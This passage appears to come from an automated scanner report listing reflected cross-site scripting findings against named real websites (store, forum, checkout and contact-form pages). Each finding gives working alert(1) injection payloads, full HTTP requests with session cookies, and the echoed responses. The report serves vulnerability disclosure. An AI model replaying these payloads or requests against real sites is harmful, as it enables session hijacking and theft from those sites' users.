Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /s.nl?c=438708&n=1&sc=3&ext=T&promocode=&qtyadd=1&mboxSession=1303736347554-914602&Submit.x=43&productId=1650&Submit.y=8&whence=&6483e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527be136aaa48c=1 HTTP/1.1
Host: shopping.netsuite.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/store
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=dYyfN1wHZN71TmqdTHVPc5rfpmdrpWWkqQGJBTWHYGvFy6PP4kwCF9spppQp2p6T1y9LcTBvdSVRJT4zdGg0FbSwpQwRl5vyB94JHShTwbxX21bQLM8ycnhGDnyFQxbh!-2139436563; NLVisitorId=rcHW8415AZeYvnmq; NLShopperId=rcHW8415AciYvvMS; NLPromocode=438708_; promocode=; NS_VER=2011.1.0

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 13:20:44 GMT
Server: Apache
Cache-Control: No-Cache,no-store
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 1564875036:73686F702D6A6176613031322E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 54762


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>ESET Shopping Cart - ESET North America</title>


<script type="text/javascript">
var gaJsHost = (("https:" =
...[SNIP]...
<input type='hidden' name='referer' value='http://shopping.netsuite.com/s.nl?c=438708&sc=3&6483e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527be136aaa48c=1&whence=&6483e'style='x:expression(alert(1))'be136aaa48c=1&6483e%27style%3d%27x%3aexpression%28alert%281%29%29%27be136aaa48c=1&qtyadd=1&n=1&mboxSession=1303736347554-914602&ext=T&Submit.x=43&productId=1650&Submit.y=8'>
...[SNIP]...

5.36. http://tools.manageengine.com/forums/security-manager/forum.php [char parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tools.manageengine.com
Path:   /forums/security-manager/forum.php

Issue detail

The value of the char request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 78007%3balert(1)//2b991119c48 was submitted in the char parameter. This input was echoed as 78007;alert(1)//2b991119c48 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /forums/security-manager/forum.php?limit=5&char=2578007%3balert(1)//2b991119c48 HTTP/1.1
Host: tools.manageengine.com
Proxy-Connection: keep-alive
Referer: http://www.manageengine.com/products/security-manager/security-manager-forum.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208542606.1303732848.2.2.utmgclid=CL-9_6TPt6gCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=208542606.1253035426.1303526945.1303526945.1303732848.2; __utmc=208542606; __utmb=208542606.4.10.1303732848

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:12:09 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 64452

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<style>
body
{
}
.forumTitle{float:left; margin-top:-12px; padding-left:10px; font:11px Verdana, Arial, Helvetica, sans-serif;color:#000;line-height:
...[SNIP]...
<a class=\"forumTitle\" target=\"_blank\" href='http://forums.manageengine.com/#Topic/"+rem[i].tpid+"'>"+forumtitle.substring(0,2578007;alert(1)//2b991119c48)+"...</a>
...[SNIP]...

5.37. http://widgets.digg.com/buttons/count [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.digg.com
Path:   /buttons/count

Issue detail

The value of the url request parameter is copied into the HTML document as plain text between tags. The payload b0826<script>alert(1)</script>044029140f9 was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /buttons/count?url=file%3A///C%3A/cdn/2011/04/25/dork/reflected-xss-cross-site-scripting-cwe-79-capec-86-ghdb-stillsecurecom.htmlb0826<script>alert(1)</script>044029140f9 HTTP/1.1
Host: widgets.digg.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Age: 0
Date: Mon, 25 Apr 2011 12:10:55 GMT
Via: NS-CACHE: 100
Etag: "3112ca90777458234aafe3bc78669cb02bb4b372"
Content-Length: 191
Server: TornadoServer/0.1
Content-Type: application/json
Accept-Ranges: bytes
Cache-Control: private, max-age=599
Expires: Mon, 25 Apr 2011 12:20:54 GMT
X-CDN: Cotendo
Connection: Keep-Alive

__DBW.collectDiggs({"url": "file:///C:/cdn/2011/04/25/dork/reflected-xss-cross-site-scripting-cwe-79-capec-86-ghdb-stillsecurecom.htmlb0826<script>alert(1)</script>044029140f9", "diggs": 0});

5.38. https://www.controlscan.com/save_order.php [company parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.controlscan.com
Path:   /save_order.php

Issue detail

The value of the company request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3c8d1'%3balert(1)//ee74115e8d1 was submitted in the company parameter. This input was echoed as 3c8d1';alert(1)//ee74115e8d1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

POST /save_order.php HTTP/1.1
Host: www.controlscan.com
Connection: keep-alive
Referer: https://www.controlscan.com/checkout.php
Cache-Control: max-age=0
Origin: https://www.controlscan.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=00f4el4lcuvnop42qop34mkqh4; __utmz=180386997.1303732833.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fpc1000725800122=O1TwOju5|4ybarsbLaa|fses1000725800122=|4ybarsbLaa|O1TwOju5|fvis1000725800122=Zj1odHRwcyUzQSUyRiUyRnd3dy5jb250cm9sc2Nhbi5jb20lMkYmYj1Db250cm9sU2NhbiUyMFBDSSUyMENvbXBsaWFuY2UlMjAlN0MlMjBHZXQlMjBQQ0klMjBDb21wbGlhbnQlMjBUb2RheSE=|8MYMHMsoss|8MYMHMsoss|8MYMHMsoss|8|8MYMHMsoss|8MYMHMsoss; __utma=180386997.730761609.1303732833.1303732833.1303735963.2; __utmc=180386997; __utmb=180386997.3.10.1303735963; com.vtrenz.iMAWebCookie=49379056-69d2-6147-26ad-65d29c6189eb; com.vtrenz.iMA.session=3cd51bd8-477e-ec0e-65cc-8ca3a9c2b5ac
Content-Length: 348

total=747.00&firstname=%27&lastname=%27&company=%27%273c8d1'%3balert(1)//ee74115e8d1&email=%27%40%3B.net&phone=111-222-3334&merchantID=&ipscan=10.0.1.1&cardfname=1&cardlname=1&address1=1&address2=1&city=dg&country=us&province=&state=AL&zipcode=09876&cardtype=MC&cardnumber=54636345635
...[SNIP]...

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:57:47 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="PHY DEM ONL STA PUR NAV COM OUR DELo CUR ADM DEV IDC COR BUS DSP"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 26903

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<script type="text/javascript">
/*globals YWA*/
var YWATracker = YWA.getTracker("1000725800122");
YWATracker.setMemberId('''3c8d1';alert(1)//ee74115e8d1_');/*
YWATracker.setDocumentName("");
YWATracker.setDocumentGroup("");
*/
YWATracker.submit();
</script>
...[SNIP]...

5.39. https://www.fusionvm.com/FusionVM/DesktopDefault.aspx [_IG_CALLBACK parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.fusionvm.com
Path:   /FusionVM/DesktopDefault.aspx

Issue detail

The value of the _IG_CALLBACK request parameter is copied into the HTML document as plain text between tags. The payload 5a188<script>alert(1)</script>e5eb79051f was submitted in the _IG_CALLBACK parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /FusionVM/DesktopDefault.aspx HTTP/1.1
Host: www.fusionvm.com
Connection: keep-alive
Referer: https://www.fusionvm.com/FusionVM/DesktopDefault.aspx
Origin: https://www.fusionvm.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQQQASDQQ=MNOLHEFCGKBHGOHLANCBPEKB; CriticalWatch_WinMgmt=1ea476ea-f298-43b7-b986-76b4c2ad1a2b; ASP.NET_SessionId=ldofgy3miecclj01ixxgal4x; __utmz=61526075.1303736107.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=61526075.1350494952.1303736107.1303736107.1303736107.1; __utmc=61526075; __utmb=61526075.1.10.1303736107
Content-Length: 5126

_IG_CSS_LINKS_=&ctl01xDesktopThreePanes1xThreePanesxctl05xAdvisoriesGrid=&ctl01$DesktopThreePanes1$ThreePanes$ctl01$SigninDBControl$password=&ctl01$DesktopThreePanes1$ThreePanes$ctl01$SigninDBControl$
...[SNIP]...
0alhcvIV7k7bu3g37AjmVa5J8yQOnBJBS8b%2Btlnypc31JyCiXOrCIh%2Fwf2BKBjw%3D%3D&__EVENTARGUMENT=&__EVENTTARGET=&_IG_CALLBACK=ctl01%24Banner%24UserSessionTimer1%24WebAsyncRefreshPanel1%23_0.084691817406564955a188<script>alert(1)</script>e5eb79051f

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Date: Mon, 25 Apr 2011 12:57:37 GMT
Content-Length: 5375

/FusionVM/Images/FooterBackground2.gif/FusionVM/Images/CW-Logo-NoTag-Rev-MinSize.gif20112011.3.0.27<&>0ctl01$Banner$UserSessionTimer1$WebAsyncRefreshPanel1<&>0_0.084691817406564955a188<script>alert(1)</script>e5eb79051f<&>
...[SNIP]...

5.40. https://www.fusionvm.com/FusionVM/DesktopDefault.aspx [__EVENTVALIDATION parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.fusionvm.com
Path:   /FusionVM/DesktopDefault.aspx

Issue detail

The value of the __EVENTVALIDATION request parameter is copied into the HTML document as plain text between tags. The payload 2417a<script>alert(1)</script>718a25325a7 was submitted in the __EVENTVALIDATION parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /FusionVM/DesktopDefault.aspx HTTP/1.1
Host: www.fusionvm.com
Connection: keep-alive
Referer: https://www.fusionvm.com/FusionVM/DesktopDefault.aspx
Origin: https://www.fusionvm.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQQQASDQQ=MNOLHEFCGKBHGOHLANCBPEKB; CriticalWatch_WinMgmt=1ea476ea-f298-43b7-b986-76b4c2ad1a2b; ASP.NET_SessionId=ldofgy3miecclj01ixxgal4x; __utmz=61526075.1303736107.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=61526075.1350494952.1303736107.1303736107.1303736107.1; __utmc=61526075; __utmb=61526075.1.10.1303736107
Content-Length: 5126

_IG_CSS_LINKS_=&ctl01xDesktopThreePanes1xThreePanesxctl05xAdvisoriesGrid=&ctl01$DesktopThreePanes1$ThreePanes$ctl01$SigninDBControl$password=&ctl01$DesktopThreePanes1$ThreePanes$ctl01$SigninDBControl$email=&__EVENTVALIDATION=%2FwEWBgKu2sn5AwLrz4T3CALMifq8DQLys6fMBwLn8K3zAwLxjbWVD6Xmq0l0NMQsglcvAmN0lT8Jos9NDGM8PnY%2Fy9C8ZIzR2417a<script>alert(1)</script>718a25325a7&__VIEWSTATE=1eNrdW81vG8cVFylRlkLHdGObTeOAmihObMX82CW5%2FFCsJJRkR4otRxUpOUgguMOdITnWcpfdnRXFHoqeeuyhKFK0hxZJPw5F0X%2BhQK9tcuihQE9tXfTj1KbfBXpI3%2BwuRVKSLVOioTAUwFnOvjf73vv95s3X6mNfKBQIxmRFTqdz8JcMhf2R
...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Date: Mon, 25 Apr 2011 12:56:31 GMT
Content-Length: 1716

<&>0ctl01$Banner$UserSessionTimer1$WebAsyncRefreshPanel1<&>0<error><&>0System.Web.HttpException (0x80004005): The state information is invalid for this page and might be corrupted. ---> System.Web.UI.
...[SNIP]...
ows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
   ViewState: /wEWBgKu2sn5AwLrz4T3CALMifq8DQLys6fMBwLn8K3zAwLxjbWVD6Xmq0l0NMQsglcvAmN0lT8Jos9NDGM8PnY/y9C8ZIzR2417a<script>alert(1)</script>718a25325a7 --->
...[SNIP]...

5.41. https://www.fusionvm.com/FusionVM/DesktopDefault.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.fusionvm.com
Path:   /FusionVM/DesktopDefault.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ad15c"-alert(1)-"7bb0c543e64 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /FusionVM/DesktopDefault.aspx?ad15c"-alert(1)-"7bb0c543e64=1 HTTP/1.1
Host: www.fusionvm.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQQQASDQQ=MNOLHEFCGKBHGOHLANCBPEKB; CriticalWatch_WinMgmt=1ea476ea-f298-43b7-b986-76b4c2ad1a2b; ASP.NET_SessionId=ldofgy3miecclj01ixxgal4x

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Mon, 25 Apr 2011 12:56:49 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Date: Mon, 25 Apr 2011 12:56:48 GMT
Content-Length: 33904


<html>
<head id="htmlHead">
</head>
<body onload="sClock();">
<form method="post" action="DesktopDefault.aspx?ad15c%22-alert(1)-%227bb0c543e64=1" id="ctl00">
<div class="aspNetHidden">
<input
...[SNIP]...
<script language="javascript">Session_Init("/FusionVM/DesktopDefault.aspx?ad15c"-alert(1)-"7bb0c543e64=1", "/FusionVM/go/www.fusionvm/0/en-US/username=/Default.aspx");</script>
...[SNIP]...

5.42. http://www.google.com/search [tch parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.google.com
Path:   /search

Issue detail

The value of the tch request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload dbae5(a)c4e69dbcb8a was submitted in the tch parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /search?sclient=psy&hl=en&source=hp&q=learn.shavlik.com%2Fshavlik%2Findex.cfm%3Fm%3D1112%26pg%3D697&aq=f&aqi=&aql=&oq=&pbx=1&bav=on.2,or.r_gc.r_pw.&fp=76258fd74ceb8990&tch=1dbae5(a)c4e69dbcb8a&ech=1&psi=QW21TdK5G9PngQf2xuWSBA13037356298833 HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Avail-Dictionary: rU20-FBA
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7; NID=46=G6tAQMMliMdgbUozp0g-12zJ4nIr9W3lVB7VLX4tvICbyeI1deRYnF0ETnjMaFRcDOw858z9ldTQARgCwUuLQTXPs03YWNQDMeYsf58qFzWq4-g9gJ1mhwHeRmKdbRzf

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:47:44 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 25014

f94-wCe9....S....o....Q...v....l.K<!doctype html><title>learn.shavlik.com/shavlik/index.cfm?m=1112&amp;pg=697. F..\(function(){var jesr_base_page_version=8;var jesr_user_state='c9c918f0';var jesr_sign
...[SNIP]...
index.cfm%3Fm%3D1112%26pg%3D697\\x26amp;aq\\x3df\\x26amp;aqi\\x3d\\x26amp;aql\\x3d\\x26amp;oq\\x3d\\x26amp;pbx\\x3d1\\x26amp;bav\\x3don.2,or.r_gc.r_pw.\\x26amp;fp\\x3d76258fd74ceb8990\\x26amp;tch\\x3d1dbae5(a)c4e69dbcb8a\\x26amp;ech\\x3d1\\x26amp;psi\\x3dQW21TdK5G9PngQf2xuWSBA13037356298833\x27)});});r();var l\x3dSN...Q\x27#\x27)):\x27#\x27;if(l\x3d\x3d\x27#\x27\x26\x26google.defre){google.defre\x3dc,~.*\x26\x26google
...[SNIP]...

5.43. http://www.stillsecure.com/m/ [comments parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.stillsecure.com
Path:   /m/

Issue detail

The value of the comments request parameter is copied into the HTML document as plain text between tags. The payload b9f53<script>alert(1)</script>165bb6e429d was submitted in the comments parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /m/?c=contact-us HTTP/1.1
Host: www.stillsecure.com
Proxy-Connection: keep-alive
Referer: http://www.stillsecure.com/m/?c=contact-us
Cache-Control: max-age=0
Origin: http://www.stillsecure.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=80d1802a2bda40500b441aefe0709f80; __utmz=183052004.1303732858.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183052004.352557952.1303732858.1303732858.1303732858.1; __utmc=183052004; __utmb=183052004.9.10.1303732858
Content-Length: 168

firstName=&lastName=&company=&email=&phone=&stateProvince=Not+Applicable&comments=b9f53<script>alert(1)</script>165bb6e429d&contact=1&refUrl=&rfId=&leadSource=Contact+Form&campaignName=Contact+Us&submit=Submit

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 11:58:59 GMT
Server: Apache/2.2.4 (Unix) mod_ssl/2.2.4 OpenSSL/0.9.7h-fips PHP/5.2.1
X-Powered-By: PHP/5.2.1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 17182

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title></title>
<style type="text/css" media="sc
...[SNIP]...
<textarea name="comments">b9f53<script>alert(1)</script>165bb6e429d</textarea>
...[SNIP]...

5.44. http://www.stillsecure.com/m/ [company parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.stillsecure.com
Path:   /m/

Issue detail

The value of the company request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2efe4"><script>alert(1)</script>2a9cfb0f5d8 was submitted in the company parameter. This input was echoed as 2efe4\"><script>alert(1)</script>2a9cfb0f5d8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /m/?c=contact-us HTTP/1.1
Host: www.stillsecure.com
Proxy-Connection: keep-alive
Referer: http://www.stillsecure.com/m/?c=contact-us
Cache-Control: max-age=0
Origin: http://www.stillsecure.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=80d1802a2bda40500b441aefe0709f80; __utmz=183052004.1303732858.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183052004.352557952.1303732858.1303732858.1303732858.1; __utmc=183052004; __utmb=183052004.9.10.1303732858
Content-Length: 168

firstName=&lastName=&company=2efe4"><script>alert(1)</script>2a9cfb0f5d8&email=&phone=&stateProvince=Not+Applicable&comments=&contact=1&refUrl=&rfId=&leadSource=Contact+Form&campaignName=Contact+Us&submit=Submit

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 11:58:45 GMT
Server: Apache/2.2.4 (Unix) mod_ssl/2.2.4 OpenSSL/0.9.7h-fips PHP/5.2.1
X-Powered-By: PHP/5.2.1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 17185

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title></title>
<style type="text/css" media="sc
...[SNIP]...
<input name="company" type="text" value="2efe4\"><script>alert(1)</script>2a9cfb0f5d8">
...[SNIP]...

5.45. http://www.stillsecure.com/m/ [email parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.stillsecure.com
Path:   /m/

Issue detail

The value of the email request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f5b7"><script>alert(1)</script>eaa16a5bb36 was submitted in the email parameter. This input was echoed as 1f5b7\"><script>alert(1)</script>eaa16a5bb36 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /m/?c=contact-us HTTP/1.1
Host: www.stillsecure.com
Proxy-Connection: keep-alive
Referer: http://www.stillsecure.com/m/?c=contact-us
Cache-Control: max-age=0
Origin: http://www.stillsecure.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=80d1802a2bda40500b441aefe0709f80; __utmz=183052004.1303732858.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183052004.352557952.1303732858.1303732858.1303732858.1; __utmc=183052004; __utmb=183052004.9.10.1303732858
Content-Length: 168

firstName=&lastName=&company=&email=1f5b7"><script>alert(1)</script>eaa16a5bb36&phone=&stateProvince=Not+Applicable&comments=&contact=1&refUrl=&rfId=&leadSource=Contact+Form&campaignName=Contact+Us&submit=Submit

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 11:58:48 GMT
Server: Apache/2.2.4 (Unix) mod_ssl/2.2.4 OpenSSL/0.9.7h-fips PHP/5.2.1
X-Powered-By: PHP/5.2.1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 17196

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title></title>
<style type="text/css" media="sc
...[SNIP]...
<input name="email" type="text" value="1f5b7\"><script>alert(1)</script>eaa16a5bb36">
...[SNIP]...

5.46. http://www.stillsecure.com/m/ [firstName parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.stillsecure.com
Path:   /m/

Issue detail

The value of the firstName request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 54249"><script>alert(1)</script>bb0ca4d9c50 was submitted in the firstName parameter. This input was echoed as 54249\"><script>alert(1)</script>bb0ca4d9c50 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /m/?c=contact-us HTTP/1.1
Host: www.stillsecure.com
Proxy-Connection: keep-alive
Referer: http://www.stillsecure.com/m/?c=contact-us
Cache-Control: max-age=0
Origin: http://www.stillsecure.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=80d1802a2bda40500b441aefe0709f80; __utmz=183052004.1303732858.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183052004.352557952.1303732858.1303732858.1303732858.1; __utmc=183052004; __utmb=183052004.9.10.1303732858
Content-Length: 168

firstName=54249"><script>alert(1)</script>bb0ca4d9c50&lastName=&company=&email=&phone=&stateProvince=Not+Applicable&comments=&contact=1&refUrl=&rfId=&leadSource=Contact+Form&campaignName=Contact+Us&submit=Submit

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 11:58:38 GMT
